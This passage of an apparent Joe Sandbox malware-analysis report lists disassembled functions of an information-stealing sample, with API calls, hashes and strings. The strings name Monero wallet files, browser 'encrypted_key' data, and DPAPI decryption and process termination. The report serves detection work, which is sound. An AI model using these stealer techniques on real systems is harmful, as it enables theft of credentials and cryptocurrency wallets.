                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 07435dfd65fa43a7814629fed067686beb75d2da823935a033708263daffa14a
                          • Instruction ID: f727ed7e75c65934af3fc6f130f2f1465cfa966cd4508246718fd0363928680b
                          • Opcode Fuzzy Hash: 07435dfd65fa43a7814629fed067686beb75d2da823935a033708263daffa14a
                          • Instruction Fuzzy Hash: 6EE105728101199BDB04FBA4DCA9EEE7738BF94301F50825AF91772091EF346A4DCB66
                          Function 0054D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0123ED70,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054D481
                          • lstrlen.KERNEL32(00000000), ref: 0054D698
                          • lstrlen.KERNEL32(00000000), ref: 0054D6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 0054D72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 957931c790ea410a7d711780f2bc308e58600e9c62b2aa6be65d172bbf1004b5
                          • Instruction ID: bb55c24b0563f19868464467eb3b8617c289e58c8a48576a330db8ca67d68301
                          • Opcode Fuzzy Hash: 957931c790ea410a7d711780f2bc308e58600e9c62b2aa6be65d172bbf1004b5
                          • Instruction Fuzzy Hash: 7E91F3729101199BDB04FBA4DC6ADEE7B38BF94301F50825AF90766091EF346A0DCB66
                          Function 0054D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0123ED70,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054D801
                          • lstrlen.KERNEL32(00000000), ref: 0054D99F
                          • lstrlen.KERNEL32(00000000), ref: 0054D9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 0054DA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 03e63f4d7e801832d3c140ecec666106b776b1bb6d6a5190718c2cc0b63150b5
                          • Instruction ID: 90d356ce6535db78ddb3e5459bf64d55bb91af62d0eb9e9704fdaf298da1c2e4
                          • Opcode Fuzzy Hash: 03e63f4d7e801832d3c140ecec666106b776b1bb6d6a5190718c2cc0b63150b5
                          • Instruction Fuzzy Hash: 0581E3729101199BDB04FBA4DC6ADEE7B38BF94301F50461AF907A6091FF346A0DCB66
                          Function 0054F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                            • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                            • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                            • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                            • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                            • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                            • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00561580,00560D92), ref: 0054F54C
                          • lstrlen.KERNEL32(00000000), ref: 0054F56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: 49bcffd257cb1d07fd3b0ba9c2ffd09254bc4779b0dd1089ce3093091b06ebb2
                          • Instruction ID: 69d75cf741c8010d092ac5da7bc7713bcca57574e9c3c40cf811166c58df3f1e
                          • Opcode Fuzzy Hash: 49bcffd257cb1d07fd3b0ba9c2ffd09254bc4779b0dd1089ce3093091b06ebb2
                          • Instruction Fuzzy Hash: AD51F371D10109AADB04FBA4DC6ADED7B78BF94301F408629FC1667195EE346A0DCBA2
                          Function 00553560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 69cc1b772e12da903a639c29129e533173acfe20df5c3189c8121c7d4f2b389e
                          • Instruction ID: 08b6c86bdeeccb9fc78acbf3b94bd58a582eb566921ae051c42fee2712357c76
                          • Opcode Fuzzy Hash: 69cc1b772e12da903a639c29129e533173acfe20df5c3189c8121c7d4f2b389e
                          • Instruction Fuzzy Hash: FB415171D10109ABCB04EFA4D865AEEBB74BF54305F00851AE81677290EB74A609CFA2
                          Function 00549CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                            • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                            • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                            • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                            • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                            • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                            • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00549D39
                            • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549AEF
                            • Part of subcall function 00549AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00544EEE,00000000,?), ref: 00549B01
                            • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549B2A
                            • Part of subcall function 00549AC0: LocalFree.KERNEL32(?,?,?,?,00544EEE,00000000,?), ref: 00549B3F
                            • Part of subcall function 00549B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00549B84
                            • Part of subcall function 00549B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00549BA3
                            • Part of subcall function 00549B60: LocalFree.KERNEL32(?), ref: 00549BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: e9f7ebf986a43758ddb2e7d6880201ee5ddb5ea3209e9ea178b8164bfe84595b
                          • Instruction ID: 36b711720b59c65eec10004f8adef06eb18f7e9c59e0d867db544d095c9bd5af
                          • Opcode Fuzzy Hash: e9f7ebf986a43758ddb2e7d6880201ee5ddb5ea3209e9ea178b8164bfe84595b
                          • Instruction Fuzzy Hash: 353124B5D10209ABCF14DFE4DD96EEF7BB8BF88304F144519E905A7241EB349A04CBA5
                          Function 005594D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 005594EB
                            • Part of subcall function 00558D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0055951E,00000000), ref: 00558D5B
                            • Part of subcall function 00558D50: RtlAllocateHeap.NTDLL(00000000), ref: 00558D62
                            • Part of subcall function 00558D50: wsprintfW.USER32 ref: 00558D78
                          • OpenProcess.KERNEL32(00001001,00000000,?), ref: 005595AB
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 005595C9
                          • CloseHandle.KERNEL32(00000000), ref: 005595D6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                          • String ID:
                          • API String ID: 3729781310-0
                          • Opcode ID: 4b2d22210537b0c952ca94e534c35066dada4d8f818927a6e8de18b8ff188a22
                          • Instruction ID: 4bff82170f27304cb8d01bade7854c12514b4c2f8ca12b31bc89e52b6fbc95bd
                          • Opcode Fuzzy Hash: 4b2d22210537b0c952ca94e534c35066dada4d8f818927a6e8de18b8ff188a22
                          • Instruction Fuzzy Hash: B1311071940208EFDB14DBD0CD59BEDB774FF44301F20855AE906AA184EB789A49CB55
                          Function 00558680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005605B7), ref: 005586CA
                          • Process32First.KERNEL32(?,00000128), ref: 005586DE
                          • Process32Next.KERNEL32(?,00000128), ref: 005586F3
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • CloseHandle.KERNEL32(?), ref: 00558761
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 356f7bc12dadb726fdd310b7991dd0c256bff0c6dff9db9e61b7f3e3a46d0c34
                          • Instruction ID: 69418c66d48af56909c3f3ebe07d03f2d9dcaf19793ec767346d2dbd578380b9
                          • Opcode Fuzzy Hash: 356f7bc12dadb726fdd310b7991dd0c256bff0c6dff9db9e61b7f3e3a46d0c34
                          • Instruction Fuzzy Hash: 69316F71911119ABDB24DF50CC65FEEBB78FB49701F10429AE90AA21A0DB346A49CFA1
                          Function 00557980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00560E00,00000000,?), ref: 005579B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 005579B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00560E00,00000000,?), ref: 005579C4
                          • wsprintfA.USER32 ref: 005579F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: a9ed31b1856eed6ea6ece2e161c329108f52c0b614767a9c24a38a1d88788f4b
                          • Instruction ID: 83dcc30871bcf1bd2f13c33be32feef1444f6ac2b1d1a96f59e62398c51665cd
                          • Opcode Fuzzy Hash: a9ed31b1856eed6ea6ece2e161c329108f52c0b614767a9c24a38a1d88788f4b
                          • Instruction Fuzzy Hash: 3C1118B2944118AADB149FC9DD45BBEBBF8FB4CB11F10411AF605A2280E23D5940CBB5
                          Function 0055C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 0055C74E
                            • Part of subcall function 0055BF9F: __amsg_exit.LIBCMT ref: 0055BFAF
                          • __getptd.LIBCMT ref: 0055C765
                          • __amsg_exit.LIBCMT ref: 0055C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0055C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
